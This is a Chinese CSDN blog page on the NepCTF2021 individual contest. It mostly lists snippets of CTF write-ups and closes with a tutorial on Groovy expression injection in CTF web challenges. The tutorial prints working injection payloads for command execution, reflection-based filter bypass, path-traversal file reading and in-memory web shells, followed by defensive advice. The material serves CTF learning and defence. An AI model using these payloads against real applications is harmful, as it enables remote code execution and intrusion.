NepCTF2021个人赛

最新推荐文章于 2025-09-09 21:33:06 发布
原创 最新推荐文章于 2025-09-09 21:33:06 发布 · 487 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了NepCTF2021比赛中的Pwn题目,涵盖漏洞利用技巧、内存理解与实战操作,为参赛者和安全爱好者提供深入学习资料。
2021 N1CTF mmmmmmmap
weixin_46483787的博客
04-07 357
这个题很有意思,考查到了不是很常用的chunk低三位里的M位,当M位为1的时候,表示chunk是由mmap申请出来的 题目结构是常见的菜单堆题,在异或的部分有一个小溢出 然后在exit中给了一个格式化字符串,但是有一个条件: 即必须要write(1,buf,0xa)失败,而buf是程序一开始申请的一个chunk,即便我们把它free掉或者做什么处理,至少不会让write失败,能让它返回-1的唯一条件是buf变成指向一块无法访问的内存,那么什么样的内存无法访问,被munmap收回的内存无法访问,所以做法是通
NepCTF2021-Web部分(除画皮)
Y4tacker的博客
03-22 3642
文章目录little_trickfaka_revengeEasy_Tomcatbbxhh_revenge非预期预期 little_trick 打开环境发现代码是这个,太简单了,签到题 <?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)&lt
ctf比赛的三种形式
热门推荐
qq_33881738的博客
03-10 1万+
竞赛模式编辑 CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在...
2021 Nepctf worrrrms
qq_37073764的博客
03-29 304
这题挺有意思的 先是压缩包,一解压就说文件不是压缩文件,不知道干嘛了,重新下载了一个才行。 解压后,拖入ida打开,发现是go语言,看不懂。然后百度一下,可以安装插件,IDAGolangHelper,谷歌百度一下就有了,安装好,再去看看。发现Go语言函数名都恢复了,虽然代码一点也不可读,但至少看着稍微顺眼一点点吧…… 然后找啊找,找了很久,在worrrrms_puzzle_ChkPlz 和worrrrms_puzzle_Gotcha找到了key和word,然后乱试,就把flag搞出来了。 由于pysm4
2021NepCTF REVERSE-Hardcsharp Writeup
Nu1bzzi的博客
03-22 502
2021NepCTF REVERSE-Hardcsharp 首先拿到文件第一步用PEiD查壳(养成好习惯) 什么都没找到QAQ,萌新只知道是32位的程序于是顺手放进IDA进行分析 在放入时发现该程序是由.NET做的 进入后点进jmp后的函数果然发现了熟悉的东西 直接放入Dnspy中进行分析(Dnspy的详细使用方法和下载地址在这里????QAQ) 一个个点开之后发现我们要分析的主要函数在@02000002中 而我们需要注意的是这部分的运算 由for循环函数可知array[]数组中每一项都与51做了
NepCTF
as you know, nlp is fantasitc!
07-19 277
这次用百度做出来两道Web题,记录一下。
NepCTF比赛官方writeup1
08-04
NepCTF比赛官方writeup1
NepCTF2022-个人Writeup
m0_61596829的博客
07-17 2045
NepCTF2022-个人Writeup
Nep欢乐个人赛部分复现记录
mcmuyanga的博客
03-24 1183
写在前面:感谢不会修电脑师傅的指导 博客园维护,没法看不会修电脑师傅的博客,详细的先看这位大佬文章,比赛时只做出来了一道re一道pwn,还是太菜了。每天写一点,记录一下复现过程。 Re hardcsharp 例行检查,c#写的 一开始用ida反编译的,看不大懂,百度后用的dnSpy反编译 // hardcsharp.Program // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250 private static voi
NepCTF2025-个人writeup
最新发布
Niuma1122的博客
09-09 254
NepCTF
ctf 个人赛总结
西部壮仔的博客
08-09 3341
1.web 1. 从题目上看这道题得想让我们做的是绕过is_numeric 函数和intval函数a2可以用16进制和科学计数法来绕过is_numeric函数,hash_hmac函数对数组加密返回为空,我们就可以控制这个函数,我们可以把这些代码拷贝下来算出hmac的值让hmac的值让hmac的值让a3=这个值绕过die函数最后的构造为?a1=[]=3$a2=1e9&ccb3fd8a1db...
Nep欢乐个人赛-RE-hardsharp
AlienEowynWan的博客
03-20 271
(这道题也是本菜鸡在参加的所有CTF比赛中独立解决的第一道题,谨做纪念) 题目: 链接:https://pan.baidu.com/s/1ktDs3UPwUONpDKyIe0IlrQ 提取码:86n1 复制这段内容后打开百度网盘手机App,操作更方便哦; 查壳,C#编写的 dnSpy32打开, 定位到主函数 // hardcsharp.Program // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250 private s
粉丝答疑:CTF可以一个人参加比赛吗?_ctf可以个人参赛吗
hackeroink的博客
12-30 944
WEB(web类):WEB应用在今天越来越广泛,也是CTF夺旗竞赛中的主要题型,题目涉及到常见的Web漏洞,诸如注入、XSS、文件包含、代码审计、上传等漏洞。话虽如此,现在 CTF 大赛都已经往实战的方向走了,高水准的 CTF 题目很多都会模拟真实的网站,让你更加有真实渗透的代入感,渗透手法也更加贴近实战。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
NepCTF2021一些web题目的总结与复现
feng的博客
03-23 4521
前言 参加了今年的NepCTF,题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,
2022西电抗疫CTF个人赛
k0414的博客
01-07 3955
2022西电抗疫CTF个人赛 详细写了下crypto的wp,其余方向简略给出思路或脚本 文章目录2022西电抗疫CTF个人赛CRYPTO1.做个核酸签个到2.Random?Secure?Algorithm?3.fight_against_covid4.AweSomeSha3!5.BOB的健康码5.1 BOB的健康码15.2 BOB的健康码25.3 BOB的健康码3MISC1-6WEB1-6PWN1-34.Collision5.scripts6.formatstringREVERSE1.the edge2.b
[CTF复现]N1CTF2021-queryallthings
anwen12的博客
11-24 932
N1CTF2021-queryallthethings 0x01 osquery 突破 开局一张图,答案全靠猜 看到sql注入冲压!. 一顿fuzz发现是pgsql!!! 虫虫 堆叠注入 查一下用户 查一下权限, yi? 怎么什么都没有??? 这里可以通过一个特性来确定 https://www.sqlite.org/schematab.html http://47.57.246.66:12321/?str=world'; select * from sqlite_temp_master;--+ 可以理解
粉丝答疑:CTF可以一个人参加比赛吗?
Libra1313的博客
03-15 3102
WEB(web类):WEB应用在今天越来越广泛,也是CTF夺旗竞赛中的主要题型,题目涉及到常见的Web漏洞,诸如注入、XSS、文件包含、代码审计、上传等漏洞。话虽如此,现在 CTF 大赛都已经往实战的方向走了,高水准的 CTF 题目很多都会模拟真实的网站,让你更加有真实渗透的代入感,渗透手法也更加贴近实战。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
NepCTF2024
08-25 325
friida过调试。然后改成17013 点一下修改。unidbg模拟跑一下。
PolarCTF2024冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
2401_83621784的博客
04-15 1287
是php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域,假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。(补题发现,秋季那道ezupload,上传GIF文件,再抓包改php后缀,蚁剑,不过我连接的时候,警告返回数据为空?上传文件之后,可以F12查看网络,就可以看到文件上传的位置了,再用蚁剑连接即可。
https://nepctf31-7h6e-crkd-ys83-poomzypnv770.nepctf.com/这道题的解题思路
07-28
Groovy表达式注入漏洞在CTF竞赛中是一种常见的攻击面,尤其在Web类题目中,攻击者可以利用用户输入的未过滤或未转义部分注入Groovy表达式,从而实现远程代码执行(RCE)或获取敏感信息。此类漏洞通常出现在使用Groovy动态执行表达式的场景中,如模板引擎、配置解析或脚本执行模块。 ### Groovy表达式注入的常见攻击方式 Groovy支持通过`Eval`类或`GroovyShell`执行动态表达式。如果用户输入未经过滤或转义,攻击者可以构造恶意输入注入任意Groovy代码。例如: ```groovy def result = Eval.x(1, "x + ${params.input}") ``` 若`params.input`未经过滤,攻击者可以构造类似`' + {`calc`}`的输入,从而执行任意命令。在CTF中,这种漏洞通常作为入口点,结合其他技术(如反序列化、SSRF等)进一步达成目标。 ### CTF题目中的典型场景 #### 1. 模板引擎注入 Groovy模板引擎允许在模板中嵌入Groovy表达式,攻击者通过注入表达式获取服务器控制权。例如,在模板中使用`${}`进行变量插值时,若未对输入进行限制,攻击者可以注入任意Groovy代码。 ```groovy def template = "Hello ${name}" ``` 攻击者可以提交`name`参数为`${@java.lang.Runtime.getRuntime().exec('calc')}`,从而执行任意命令。 #### 2. 动态解析配置文件 某些应用在读取配置文件时使用Groovy进行动态解析。若配置项可由用户控制,攻击者可以构造恶意配置文件,触发Groovy表达式注入。 ```groovy def config = new ConfigSlurper().parse(new File('config.groovy').toURI().toURL()) ``` 攻击者可以在`config.groovy`中插入恶意Groovy代码,实现远程代码执行。 #### 3. 插件系统或脚本执行模块 某些插件系统支持Groovy脚本加载和执行,若未对脚本内容做限制,攻击者可上传恶意脚本实现RCE。例如,攻击者可以上传包含恶意Groovy代码的插件,并触发执行。 ```groovy def script = new GroovyShell().parse(new File('plugin.groovy')) script.run() ``` 攻击者可以在`plugin.groovy`中插入恶意代码,如`Runtime.getRuntime().exec("calc")`,从而执行任意命令。 ### 利用方式与Payload构造 #### 1. 基础命令执行 攻击者通过闭包语法执行系统命令: ```groovy ${@java.lang.Runtime.getRuntime().exec('calc')} ``` 在有回显的环境下,可直接读取命令输出: ```groovy ${new java.lang.ProcessBuilder("whoami").start().getInputStream().getText()} ``` #### 2. 沙盒绕过与类加载 若存在安全限制(如SecurityManager),可通过反射加载`ClassLoader`或调用`defineClass`来绕过限制并加载恶意类: ```groovy ${ClassLoader.getSystemClassLoader().loadClass('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('calc')} ``` #### 3. 内存马注入 在Web应用中,攻击者可通过Groovy表达式注入将恶意Servlet或Filter注入内存,实现持久化控制: ```groovy ${request.servletContext.setAttribute('a', new ExploitClass())} ``` 其中`ExploitClass`为自定义恶意类,用于拦截请求并执行任意代码。 #### 4. 反序列化链利用 Groovy表达式注入常与其他漏洞(如Java反序列化)结合使用。例如,攻击者通过表达式注入触发反序列化链,最终执行恶意代码: ```groovy ${new java.io.ObjectInputStream(new java.io.ByteArrayInputStream(serializedData)).readObject()} ``` ### CTF题目示例分析 一个典型的CTF题目结构如下: - 用户提交一个表达式,服务端使用Groovy动态执行。 - 服务端限制了部分关键字(如`exec`、`Runtime`)。 - 攻击者需通过反射、闭包、字符串拼接等方式绕过限制。 例如,绕过关键字过滤的Payload如下: ```groovy ${new File('..\\..\\..\\flag.txt').getText()} ``` 若文件读取受限,可尝试命令执行: ```groovy ${'c'.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke().exec('cmd /c whoami')} ``` ### 防御建议 为防止Groovy表达式注入漏洞,建议采取以下措施: - **避免直接执行用户输入**:尽量使用静态字符串拼接或参数化方式处理用户输入。 - **使用白名单过滤机制**:对输入内容进行严格校验,仅允许特定字符或表达式。 - **启用安全上下文执行**:使用`SecureASTCustomizer`限制Groovy脚本的执行环境。 - **最小权限原则**:在受限权限下运行Groovy脚本,防止攻击者获取系统级控制权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

叶叶扁舟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值